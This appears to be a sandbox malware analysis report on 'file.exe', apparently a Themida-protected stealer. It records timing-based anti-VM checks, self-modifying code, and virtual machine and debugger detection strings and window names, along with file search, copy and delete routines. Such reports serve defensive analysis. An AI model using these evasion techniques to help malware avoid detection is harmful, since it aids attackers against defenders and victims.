              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869AAE second address: 869ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F292CD152E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F751 second address: 87F755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F755 second address: 87F775 instructions: 0x00000000 rdtsc 0x00000002 je 00007F292CD152E6h 0x00000008 jmp 00007F292CD152EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F775 second address: 87F77B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FB31 second address: 87FB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FB3A second address: 87FB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FB3E second address: 87FB47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC6C second address: 87FC70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC70 second address: 87FC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F292CD152E6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC7E second address: 87FC86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FC86 second address: 87FC9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F292CD152F2h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FF75 second address: 87FF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8800CC second address: 8800D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880226 second address: 88022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88022C second address: 88023B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F292CD152E6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88023B second address: 88023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88023F second address: 880247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882097 second address: 8820B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jp 00007F292CD65AA6h 0x0000000c popad 0x0000000d jmp 00007F292CD65AAEh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820B2 second address: 8820BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820BA second address: 8820DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F292CD65AB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jne 00007F292CD65AA6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8820DC second address: 882100 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD152F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F292CD152EEh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882100 second address: 88211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F292CD65AACh 0x0000000a jns 00007F292CD65AA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007F292CD65AA6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88211A second address: 88211E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884DAC second address: 884DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F292CD65AA6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884E70 second address: 884E76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402AD second address: 4F402B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402B1 second address: 4F402B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402B7 second address: 4F402DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F292CD65AAEh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F402DA second address: 4F4031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, DEA4h 0x00000007 call 00007F292CD152EDh 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov bx, 0E40h 0x00000016 mov dh, CEh 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov di, ax 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007F292CD152F8h 0x00000026 pop ecx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4031C second address: 4F4033C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 pushad 0x00000009 mov edi, 1EB97DD0h 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F292CD65AAFh 0x00000015 pop esi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40357 second address: 4F40374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F292CD152F8h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40374 second address: 4F40398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F292CD65AB0h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40398 second address: 4F4039E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4039E second address: 4F403D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F292CD65AAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F292CD65AACh 0x00000013 adc cl, 00000038h 0x00000016 jmp 00007F292CD65AABh 0x0000001b popfd 0x0000001c mov edx, eax 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F403D3 second address: 4F403E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F292CD152F0h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F403E7 second address: 4F403FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F292CD65AAAh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F403FC second address: 4F40402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40402 second address: 4F40406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40406 second address: 4F4040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F2AE second address: 79F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79F2B2 second address: 79F2B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5EFBFC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 5EFCA9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 791C00 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7BD7CA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7A3CBB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision graph_0-27648
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-26466
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003B18A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B3910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BE210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B4B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B4B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B23A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_003C1BF0
Source: file.exe, file.exe, 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1519984196.0000000000F85000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1519984196.0000000000F53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Note: Oreans.vxd and Software\WinLicense are strings of the Oreans WinLicense/Themida protector, and the HARDWARE\ACPI\DSDT\VBOX__ key (the ACPI DSDT table name VirtualBox exposes) sits in the same string block, so at least part of the VM detection belongs to the protector layer rather than to the stealer payload. VMwareVMware is the CPUID hypervisor vendor string VMware returns; Hyper-V RAW turns up in several heap dumps of the process.
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-26306)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-26453)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-26325)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-26460)
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node (graph_0-26349)
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort (three occurrences)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_003A4A60 VirtualProtect 00000000,00000004,00000100,? 0_2_003A4A60
